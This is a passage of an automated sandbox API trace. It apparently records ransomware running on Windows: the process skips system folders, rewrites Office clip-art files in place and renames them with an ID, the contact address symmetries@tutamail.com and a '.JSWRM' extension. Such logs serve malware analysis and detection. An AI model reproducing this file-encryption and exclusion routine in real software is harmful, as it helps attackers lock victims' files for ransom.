lpString2=".") returned 1 [0082.856] lstrcmpiW (lpString1="J0107748.WMF", lpString2="..") returned 1 [0082.856] lstrcmpiW (lpString1="J0107748.WMF", lpString2="...") returned 1 [0082.856] lstrcmpiW (lpString1="J0107748.WMF", lpString2="windows") returned -1 [0082.856] lstrcmpiW (lpString1="J0107748.WMF", lpString2="recovery") returned -1 [0082.856] lstrcmpiW (lpString1="J0107748.WMF", lpString2="perflogs") returned -1 [0082.856] lstrcmpiW (lpString1="J0107748.WMF", lpString2="documents and settings") returned 1 [0082.856] lstrcmpiW (lpString1="J0107748.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.856] lstrcmpiW (lpString1="J0107748.WMF", lpString2="system volume information") returned -1 [0082.856] lstrcmpiW (lpString1="J0107748.WMF", lpString2="msocache") returned -1 [0082.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0082.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107748.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107748.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107748.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0082.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0082.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107748.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107748.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107748.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0082.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0082.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0082.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0082.856] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107748.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107748.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.857] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8224) returned 1 [0082.857] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2020) returned 0x205850 [0082.857] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2020, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2020, lpOverlapped=0x0) returned 1 [0082.859] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.859] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2020, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2020, lpOverlapped=0x0) returned 1 [0082.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0082.860] CloseHandle (hObject=0x314) returned 1 [0082.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0082.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0082.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0082.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0082.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0082.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0082.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0082.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0082.860] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107748.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107748.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107748.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107748.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0082.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0082.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0082.861] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7a8a31, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7a8a31, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7a8a31, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x126c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107750.WMF", cAlternateFileName="")) returned 1 [0082.861] lstrcmpiW (lpString1="J0107750.WMF", lpString2=".") returned 1 [0082.861] lstrcmpiW (lpString1="J0107750.WMF", lpString2="..") returned 1 [0082.861] lstrcmpiW (lpString1="J0107750.WMF", lpString2="...") returned 1 [0082.861] lstrcmpiW (lpString1="J0107750.WMF", lpString2="windows") returned -1 [0082.861] lstrcmpiW (lpString1="J0107750.WMF", lpString2="recovery") returned -1 [0082.861] lstrcmpiW (lpString1="J0107750.WMF", lpString2="perflogs") returned -1 [0082.861] lstrcmpiW (lpString1="J0107750.WMF", lpString2="documents and settings") returned 1 [0082.861] lstrcmpiW (lpString1="J0107750.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.861] lstrcmpiW (lpString1="J0107750.WMF", lpString2="system volume information") returned -1 [0082.861] lstrcmpiW (lpString1="J0107750.WMF", lpString2="msocache") returned -1 [0082.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0082.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107750.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107750.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107750.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0082.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0082.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107750.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107750.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107750.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0082.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0082.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0082.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0082.862] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107750.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107750.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.862] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4716) returned 1 [0082.862] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1260) returned 0x205850 [0082.863] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1260, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1260, lpOverlapped=0x0) returned 1 [0082.864] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.864] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1260, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1260, lpOverlapped=0x0) returned 1 [0082.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0082.865] CloseHandle (hObject=0x314) returned 1 [0082.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0082.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0082.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0082.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0082.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0082.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0082.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0082.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0082.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0082.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0082.865] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107750.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107750.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107750.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107750.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0082.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0082.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0082.866] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe78281d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe78281d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7a8a31, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4146, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0136865.WMF", cAlternateFileName="")) returned 1 [0082.866] lstrcmpiW (lpString1="J0136865.WMF", lpString2=".") returned 1 [0082.866] lstrcmpiW (lpString1="J0136865.WMF", lpString2="..") returned 1 [0082.866] lstrcmpiW (lpString1="J0136865.WMF", lpString2="...") returned 1 [0082.866] lstrcmpiW (lpString1="J0136865.WMF", lpString2="windows") returned -1 [0082.866] lstrcmpiW (lpString1="J0136865.WMF", lpString2="recovery") returned -1 [0082.866] lstrcmpiW (lpString1="J0136865.WMF", lpString2="perflogs") returned -1 [0082.866] lstrcmpiW (lpString1="J0136865.WMF", lpString2="documents and settings") returned 1 [0082.866] lstrcmpiW (lpString1="J0136865.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.866] lstrcmpiW (lpString1="J0136865.WMF", lpString2="system volume information") returned -1 [0082.866] lstrcmpiW (lpString1="J0136865.WMF", lpString2="msocache") returned -1 [0082.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0082.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0136865.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0136865.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0136865.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0082.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0082.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0136865.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0136865.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0136865.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0082.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0082.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0082.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0082.867] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0136865.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0136865.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.868] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16710) returned 1 [0082.868] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4140) returned 0x24d210 [0082.868] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4140, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4140, lpOverlapped=0x0) returned 1 [0082.870] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.870] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4140, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4140, lpOverlapped=0x0) returned 1 [0082.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0082.871] CloseHandle (hObject=0x314) returned 1 [0082.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0082.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0082.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0082.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0082.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0082.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0082.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0082.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0082.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0082.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0082.871] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0136865.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0136865.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0136865.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0136865.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0082.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0082.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0082.872] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7cecf4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7cecf4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7cecf4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9d27, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0144773.JPG", cAlternateFileName="")) returned 1 [0082.872] lstrcmpiW (lpString1="J0144773.JPG", lpString2=".") returned 1 [0082.872] lstrcmpiW (lpString1="J0144773.JPG", lpString2="..") returned 1 [0082.872] lstrcmpiW (lpString1="J0144773.JPG", lpString2="...") returned 1 [0082.872] lstrcmpiW (lpString1="J0144773.JPG", lpString2="windows") returned -1 [0082.872] lstrcmpiW (lpString1="J0144773.JPG", lpString2="recovery") returned -1 [0082.872] lstrcmpiW (lpString1="J0144773.JPG", lpString2="perflogs") returned -1 [0082.872] lstrcmpiW (lpString1="J0144773.JPG", lpString2="documents and settings") returned 1 [0082.872] lstrcmpiW (lpString1="J0144773.JPG", lpString2="$RECYCLE.BIN") returned 1 [0082.872] lstrcmpiW (lpString1="J0144773.JPG", lpString2="system volume information") returned -1 [0082.872] lstrcmpiW (lpString1="J0144773.JPG", lpString2="msocache") returned -1 [0082.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0082.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0144773.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0144773.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0144773.JPG", lpUsedDefaultChar=0x0) returned 12 [0082.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0082.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0082.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0144773.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0144773.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0144773.JPG", lpUsedDefaultChar=0x0) returned 12 [0082.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0082.872] 